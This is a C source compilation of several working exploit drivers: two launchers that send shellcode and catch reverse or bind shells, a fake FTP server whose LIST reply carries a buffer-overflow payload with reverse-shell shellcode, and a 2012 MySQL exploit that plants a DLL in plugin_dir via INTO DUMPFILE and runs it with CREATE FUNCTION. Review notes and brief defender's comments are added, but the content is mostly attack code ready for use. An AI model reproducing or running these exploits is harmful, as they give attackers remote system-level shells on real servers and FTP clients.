/*
 * Entry point of the exploit driver. header(), parse_arguments(),
 * connect_to_remote_host(), exploit(), start_reverse_handler() and the
 * global target[] table are defined elsewhere in the file.
 *
 * Flow: clear the terminal, print the banner, fill `myargs` from argv,
 * open a TCP connection to myargs.tip:myargs.tport, then prompt on stdin
 * for the shellcode variant. Only variant 1 (connect-back) is wired up;
 * variant 0 (bind) only prints a "does not work yet" message and its
 * original call sequence is kept below as a comment.
 *
 * Exit status: 1 on an invalid menu choice or when exploit() returns 1,
 * 0 otherwise.
 */
int main(int argc, char *argv[])
{
    int s, option;
    args myargs;

    /* system() spawns a shell just to clear the screen; purely cosmetic. */
    system("clear");
    header();
    parse_arguments(argc, argv, &myargs);

    s = connect_to_remote_host(myargs.tip, myargs.tport);

    printf("--[ select shellcode\n");
    printf(" |\n");
    printf(" |- [0] bind\n");
    printf(" `- [1] cb\n");
    printf(">> ");
    /* NOTE(review): scanf()'s return value is not checked; on non-numeric
     * input `option` is never written and the switch below reads an
     * uninitialized int (UB). */
    scanf("%d", &option);

    switch (option) {
    case 0:
        /* Bind-shell path disabled by the author; see commented call below. */
        printf("--[ sorry, does not work yet :/\n");
        /*
        printf ( "--[ using bind shellcode\n" );
        if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 ) { printf ( "exploitation failed!\n" ); exit ( 1 ); }
        connect_to_bindshell ( myargs.tip, 3879 );
        */
        break;
    case 1:
        printf("--[ using cb shellcode\n");
        /* Addresses are looked up in the global target[] table via the
         * index that parse_arguments() stored in myargs.target. */
        if (exploit(s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip) == 1) {
            printf("exploitation failed!\n");
            exit(1);
        }
        /* Waits locally for the connect-back on port 45295. The socket `s`
         * is not closed on the exit(1) path above. */
        start_reverse_handler(45295);
        break;
    default:
        printf("--[ invalid shellcode!\n");
        exit(1);
    }

    close(s);
    return 0;
}
/*
 * Entry point. Usage: `<host>` alone selects the bind-shell path,
 * `<host> <connectback ip> <connectback port>` the connect-back path.
 * PORT, YELLOW/NORMAL, header(), exploit(), start_reverse_handler() and
 * connect_to_bindshell() are defined elsewhere in the file.
 *
 * Exits with status 1 on bad usage, name-resolution, socket(), connect()
 * or exploit() failure. There is no explicit `return`; main() falls off
 * the end (implicit return 0 under C99 and later).
 */
int main(int argc, char *argv[])
{
    int s;
    unsigned long xoredip;
    unsigned short xoredcbport;
    /* NOTE(review): remote_addr is never zeroed, so sin_zero carries
     * whatever was on the stack; connect() ignores it in practice but
     * a memset/`= {0}` is the usual idiom. */
    struct sockaddr_in remote_addr;
    struct hostent *host_addr;

    /* Two nested brace-less ifs: usage is printed only when argc is
     * neither 2 nor 4. */
    if (argc != 2)
        if (argc != 4) {
            fprintf(stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0]);
            exit(1);
        }

    /* gethostbyname() is obsolete (not reentrant, IPv4-only);
     * getaddrinfo() is the modern replacement. */
    if ((host_addr = gethostbyname(argv[1])) == NULL) {
        fprintf(stderr, "cannot resolve \"%s\"\n", argv[1]);
        exit(1);
    }

    remote_addr.sin_family = AF_INET;
    remote_addr.sin_addr = *((struct in_addr *) host_addr->h_addr);
    remote_addr.sin_port = htons(PORT);

    /* Cosmetic shell invocation to clear the screen, then the banner. */
    system("clear");
    header();

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("socket failed!\n");
        exit(1);
    }

    printf("--[ connecting to %s:%u...", argv[1], PORT);
    if (connect(s, (struct sockaddr *) &remote_addr, sizeof(struct sockaddr)) == -1) {
        printf("failed!\n");
        exit(1);
    }
    printf(YELLOW "done!\n" NORMAL);

    if (argc == 4) {
        /* Connect-back address and port are XOR-masked with fixed
         * constants before being passed to exploit(). atoi() gives no
         * error indication for a non-numeric argv[3]. */
        xoredip = inet_addr(argv[2]) ^ (unsigned long) 0x99999999;
        xoredcbport = htons(atoi(argv[3])) ^ (unsigned short) 0x9999;
        if (exploit(s, xoredip, xoredcbport, 0) == 1) {
            printf("exploitation FAILED!\n");
            exit(1);
        }
        /* Port is passed as the raw string here, whereas
         * connect_to_bindshell() below takes an integer port. */
        start_reverse_handler(argv[3]);
    } else {
        /* Bind-shell variant: no connect-back parameters, mode flag 1. */
        if (exploit(s, (unsigned long) NULL, (unsigned short) NULL, 1) == 1) {
            printf("exploitation FAILED!\n");
            exit(1);
        }
        connect_to_bindshell(argv[1], 4444);
    }
    /* `s` is never close()d; the process ends right after. */
}
/*
 * Minimal fake FTP control-channel loop used against a connecting FTP
 * client: reads one command at a time from `s` via get_cmd() (defined
 * elsewhere) and answers PWD/CWD/TYPE/PASV/LIST with canned replies; any
 * other command gets a 550.
 *
 *  - PASV opens a listening socket on port PASV (macro from elsewhere),
 *    accepts one data connection and recurses with it as `s2`.
 *  - LIST builds the overflow buffer from the globals `head`,
 *    `reverseshell` and the local `ret`, sends it over the data
 *    connection `s2`, then hands off to start_reverse_handler(argv3)
 *    (`argv3` is not declared here; presumably a file-scope global).
 *
 * `ip` is the dotted-quad to advertise in the 227 reply; strtok() writes
 * into it, so it must be a writable buffer. `childpid` is unused.
 *
 * Defender's note: the "directory listing" sent on LIST is a fixed-size
 * block that is mostly 0x90 padding followed by a fixed return address —
 * an easy signature for an IDS, and a reason FTP clients must bound the
 * length of directory entries they parse.
 *
 * Every write() failure exits the process with status 1; the function
 * itself never returns normally.
 */
void handle_cmd(int s, int s2, char *ip)
{
    int listenfd, connfd;
    int i = 1;
    /* NOTE(review): holds char* values cast to int (see PASV); only
     * round-trips where a pointer fits in an int (32-bit builds). */
    int tmp[4];
    unsigned long ret = 0x77ea5794; //edx eax ret in kernel32.dll
    char *a = NULL;
    char *cmd;
    char out[128], buffer[1024], addr[32];
    pid_t childpid;
    socklen_t clilen;
    struct sockaddr_in cliaddr, servaddr;

    while (1) {
        cmd = get_cmd(s);

        if (strncmp(cmd, "PWD", 3) == 0) {
            bzero(&out, 128);
            strcpy(out, "257 \"/\" is current directory.\r\n");
            if (write(s, out, strlen(out)) <= 0) {
                printf(RED "\twrite failed!\n" NORMAL);
                exit(1);
            }
        } else if (strncmp(cmd, "CWD", 3) == 0) {
            /* Same reply as PWD (257 instead of the usual 250). */
            bzero(&out, 128);
            strcpy(out, "257 \"/\" is current directory.\r\n");
            if (write(s, out, strlen(out)) <= 0) {
                printf(RED "\twrite failed!\n" NORMAL);
                exit(1);
            }
        } else if (strncmp(cmd, "TYPE", 4) == 0) {
            bzero(&out, 128);
            strcpy(out, "200 Type set to A..\r\n");
            if (write(s, out, strlen(out)) <= 0) {
                printf(RED "\twrite failed!\n" NORMAL);
                exit(1);
            }
        } else if (strncmp(cmd, "PASV", 4) == 0) {
            bzero(&addr, 32);
            /* Split `ip` on '.' and keep the four substring pointers in
             * tmp[] as ints, to be printed back with %s below.
             * NOTE(review): for a 4-octet ip the loop runs one extra
             * iteration and stores the final NULL into tmp[4], one past
             * the end of the array. `i` is also never reset, so a second
             * PASV in the same frame would index further out. */
            a = (char *) strtok(ip, ".");
            tmp[0] = (int) a;
            while (a != NULL) {
                a = (char *) strtok(NULL, ".");
                tmp[i] = (int) a;
                i++;
            }
            bzero(&out, 128);
            /* %s applied to int-typed arguments: format/argument mismatch
             * (UB); on 64-bit the truncated pointers are invalid. */
            sprintf(out, "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).\r\n", tmp[0], tmp[1], tmp[2], tmp[3]);
            if (write(s, out, strlen(out)) <= 0) {
                printf(RED "\twrite failed!\n" NORMAL);
                exit(1);
            }
            printf("--[ entering passive mode...\n");

            if ((listenfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                printf(RED "socket failed!\n" NORMAL);
                exit(1);
            }
            bzero(&servaddr, sizeof(servaddr));
            servaddr.sin_family = AF_INET;
            servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
            servaddr.sin_port = htons(PASV);
            /* NOTE(review): bind() result unchecked; a port-in-use error
             * surfaces only as a later listen()/accept() failure. */
            bind(listenfd, (struct sockaddr *) &servaddr, sizeof(servaddr));
            if (listen(listenfd, 1) == -1) {
                printf(RED "listen failed!\n" NORMAL);
                exit(1);
            }
            clilen = sizeof(cliaddr);
            if ((connfd = accept(listenfd, (struct sockaddr *) &cliaddr, &clilen)) < 0) {
                close(listenfd);
                printf(RED "accept failed!\n" NORMAL);
                exit(1);
            }
            close(listenfd);
            printf("--[" GREEN " passive connection established!\n" NORMAL);
            /* Recurse with the data connection; `addr` was zeroed and never
             * filled, so the nested call sees an empty `ip`. The previous
             * `s2` (if any) is leaked. */
            handle_cmd(s, connfd, addr);
        } else if (strncmp(cmd, "LIST", 4) == 0) {
            printf("--[" GREEN " user is trying to use \"LIST\" command\n" NORMAL);
            printf("--[ w00d w00d, let`s kick his ass...\n");
            /* Assemble the payload at fixed offsets: `head`, NOP padding,
             * a 2-byte short jump, `ret` (appended with strncat, i.e. at
             * the first NUL rather than an explicit offset), more padding,
             * then `reverseshell`, terminated with CRLF. */
            bzero(&buffer, 1024);
            memcpy(buffer, head, sizeof(head) - 1);
            memset(buffer + 68, 0x90, 255);
            memcpy(buffer + 321, "\xeb\x46", 2);
            strncat(buffer, (unsigned char *) &ret, 4);
            memset(buffer + 327, 0x90, 66);
            memcpy(buffer + 393, reverseshell, sizeof(reverseshell) - 1);
            strcat(buffer, "\r\n");

            bzero(&out, 128);
            strcpy(out, "150 Here comes the directory listing.\r\n");
            if (write(s, out, strlen(out)) <= 0) {
                printf(RED "\twrite failed!\n" NORMAL);
                exit(1);
            }
            /* NOTE(review): %d with a size_t argument; and strlen() stops
             * at the first NUL byte, so any embedded NUL in the buffer
             * would truncate the send. */
            printf("--[ sending packet [ %d bytes ]...", strlen(buffer));
            if (write(s2, buffer, strlen(buffer)) <= 0) {
                printf(RED "\twrite failed!\n" NORMAL);
                exit(1);
            }
            printf(GREEN "done!\n" NORMAL);

            bzero(&out, 128);
            strcpy(out, "226 Transfer ok\r\n");
            printf("--[ confirming...");
            if (write(s, out, strlen(out)) <= 0) {
                printf(RED "\twrite failed!\n" NORMAL);
                exit(1);
            }
            printf(GREEN "done!\n" NORMAL);
            close(s2);
            start_reverse_handler(argv3);
        } else {
            bzero(&out, 128);
            strcpy(out, "550 command not supported\r\n");
            if (write(s, out, strlen(out)) <= 0) {
                printf(RED "\twrite failed!\n" NORMAL);
                exit(1);
            }
        }
    }
}
/*
 * Entry point. Options: -u <user> -p <password> -t <host> (all required;
 * usage() is called otherwise and is assumed not to return).
 *
 * Flow, all against the authenticated connection `c`:
 *   1. create database/table `spearhead` (existing-object errors 1007/1008/
 *      1050 are tolerated);
 *   2. read payload.dll from the current directory into memory, escape it
 *      with mysql_real_escape_string() and INSERT it as a LONGBLOB;
 *   3. query @@plugin_dir (with '/' and '\' doubled for use in a literal)
 *      and SELECT ... INTO DUMPFILE the blob into that directory under a
 *      random name;
 *   4. fork(): the child sleeps 1s, runs CREATE FUNCTION ... SONAME on the
 *      dumped file, then drops the database and the function; the parent
 *      runs start_reverse_handler(443) (defined elsewhere).
 *
 * Defender's note: the observable server-side sequence — CREATE DATABASE,
 * a LONGBLOB INSERT, SELECT ... INTO DUMPFILE into @@plugin_dir and
 * CREATE FUNCTION ... SONAME — relies on FILE and CREATE privileges and on
 * a writable plugin_dir. Restricting those privileges, setting
 * secure_file_priv and auditing CREATE FUNCTION statements are the usual
 * mitigations.
 *
 * Exits with status 1 on any MySQL, file or allocation error; no heap
 * buffer or MYSQL_RES is freed before exit.
 */
int main(int argc, char *argv[])
{
    MYSQL *c;
    /* getopt() yields char*; these are unsigned char* (sign-mismatch
     * warnings, no functional effect). */
    unsigned char *target = (unsigned char *) 0;
    unsigned char *username = (unsigned char *) 0;
    unsigned char *password = (unsigned char *) 0;
    unsigned char *payload = (unsigned char *) 0;
    unsigned char *payload2 = (unsigned char *) 0;
    unsigned char *thequery = (unsigned char *) 0;
    unsigned char *stat = "INSERT INTO spearhead(weapon) VALUES('%s')";
    unsigned char *dump = (unsigned char *) 0;
    MYSQL_ROW plugin_dir;
    FILE *input = (FILE *) 0;
    /* NOTE(review): ftell() returns long; stored in int. */
    int size = -1;
    int j;
    unsigned int querylen, randno;
    MYSQL_RES *result;
    pid_t pid;

    printf("Oracle MySQL Windows SYSTEM Level Exploit (post-auth) zeroday\n""Copyright (C) 2012 Kingcope\n");

    while ((j = getopt(argc, argv, "u:p:t:")) != -1) {
        switch (j) {
        case 'u':
            username = optarg;
            break;
        case 'p':
            password = optarg;
            break;
        case 't':
            target = optarg;
            break;
        default:
            usage(argv);
        }
    }
    if (username == (unsigned char *) 0 || password == (unsigned char *) 0 || target == (unsigned char *) 0)
        usage(argv);

    c = mysql_init(NULL);
    if (c == NULL) {
        /* mysql_errno()/mysql_error() on a NULL handle — reporting only. */
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }
    if (mysql_real_connect(c, target, username, password, "mysql", 0, NULL, 0) == NULL) {
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }
    printf("Successfully Logged into MySQL Server\n""Att3mpt to R00T the b0x!\n");

    /* Start from a clean schema; 1008 = database doesn't exist,
     * 1007 = database exists, 1050 = table exists. */
    if (mysql_query(c, "drop database spearhead") && (mysql_errno(c) != 1008)) {
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }
    if (mysql_query(c, "create database spearhead") && (mysql_errno(c) != 1007)) {
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }
    if (mysql_query(c, "use spearhead")) {
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }
    if (mysql_query(c, "create table spearhead(weapon LONGBLOB)") && (mysql_errno(c) != 1050)) {
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }

    /* Opened read/write ("r+b") although it is only read. */
    input = fopen("payload.dll", "r+b");
    if (input == (FILE *) 0) {
        printf("Error: Could not open payload.dll\n");
        exit(1);
    }
    fseek(input, 0L, SEEK_END);
    size = ftell(input);
    if (size < 0) {
        printf("Error: Could not retrieve filesize of payload.dll\n");
        exit(1);
    }
    fseek(input, 0L, SEEK_SET);
    payload = (unsigned char *) malloc(size);
    if (payload == (unsigned char *) 0) {
        printf("Error: Could not allocate memory\n");
        exit(1);
    }
    /* One item of `size` bytes: a short read (or an empty file) fails. */
    if (fread(payload, size, 1, input) < 1) {
        printf("Error: Could not read payload.dll\n");
        exit(1);
    }
    fclose(input);

    /* Escaped output needs at most 2*size+1 bytes per the MySQL C API. */
    payload2 = (unsigned char *) malloc(size * 2 + 1);
    if (payload2 == (unsigned char *) 0) {
        printf("Error: Could not allocate memory\n");
        exit(1);
    }
    mysql_real_escape_string(c, payload2, payload, size);

    thequery = (unsigned char *) malloc(size * 2 + strlen(stat) + 2);
    if (thequery == (unsigned char *) 0) {
        printf("Error: could not allocate buffer\n");
        exit(1);
    }
    /* Length-explicit query because the escaped blob may contain NULs. */
    querylen = snprintf(thequery, size * 2 + strlen(stat) + 2, stat, payload2);
    if (mysql_real_query(c, thequery, querylen)) {
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }

    dump = (unsigned char *) malloc(4096);
    if (dump == (unsigned char *) 0) {
        printf("Error: could not allocate buffer\n");
        exit(1);
    }
    /* Normalise plugin_dir to backslashes and double them so the value can
     * be embedded in the DUMPFILE string literal below. */
    mysql_query(c, "SELECT REPLACE(REPLACE(@@plugin_dir, '/', '\\\\') ,'\\\\', '\\\\\\\\')");
    result = mysql_store_result(c);
    if (result == NULL) {
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }
    /* NOTE(review): row not NULL-checked before plugin_dir[0] is used, and
     * `result` is never released with mysql_free_result(). */
    plugin_dir = mysql_fetch_row(result);

    /* Random suffix only avoids name collisions; not a security measure. */
    srandom(time(NULL));
    randno = random();
    printf("Save payload to %s\\payload%d.dll\n", plugin_dir[0], randno);
    querylen = snprintf(dump, 4096, "SELECT weapon FROM spearhead INTO DUMPFILE '%s\\\\payload%d.dll'", plugin_dir[0], randno);
    if (mysql_real_query(c, dump, querylen)) {
        printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
        exit(1);
    }

    /* NOTE(review): after fork() both processes share the same MySQL
     * socket through `c`; only the child issues further queries here,
     * but both call mysql_close(c) on the shared descriptor. */
    pid = fork();
    if (pid == 0) {
        sleep(1);
        snprintf(dump, 4096, "CREATE FUNCTION mysqljackpot RETURNS STRING SONAME 'payload%d.dll'", randno);
        if (mysql_query(c, dump)) {
            printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
            exit(1);
        }
        /* Clean-up of the artifacts created above. */
        if (mysql_query(c, "drop database spearhead")) {
            printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
            exit(1);
        }
        if (mysql_query(c, "drop function mysqljackpot")) {
            printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
            exit(1);
        }
        /* NOTE(review): the child has no children of its own, so this
         * wait(0) presumably returns immediately with ECHILD. */
        wait(0);
    } else {
        start_reverse_handler(443);
    }
    printf("Done.\n");
    mysql_close(c);
}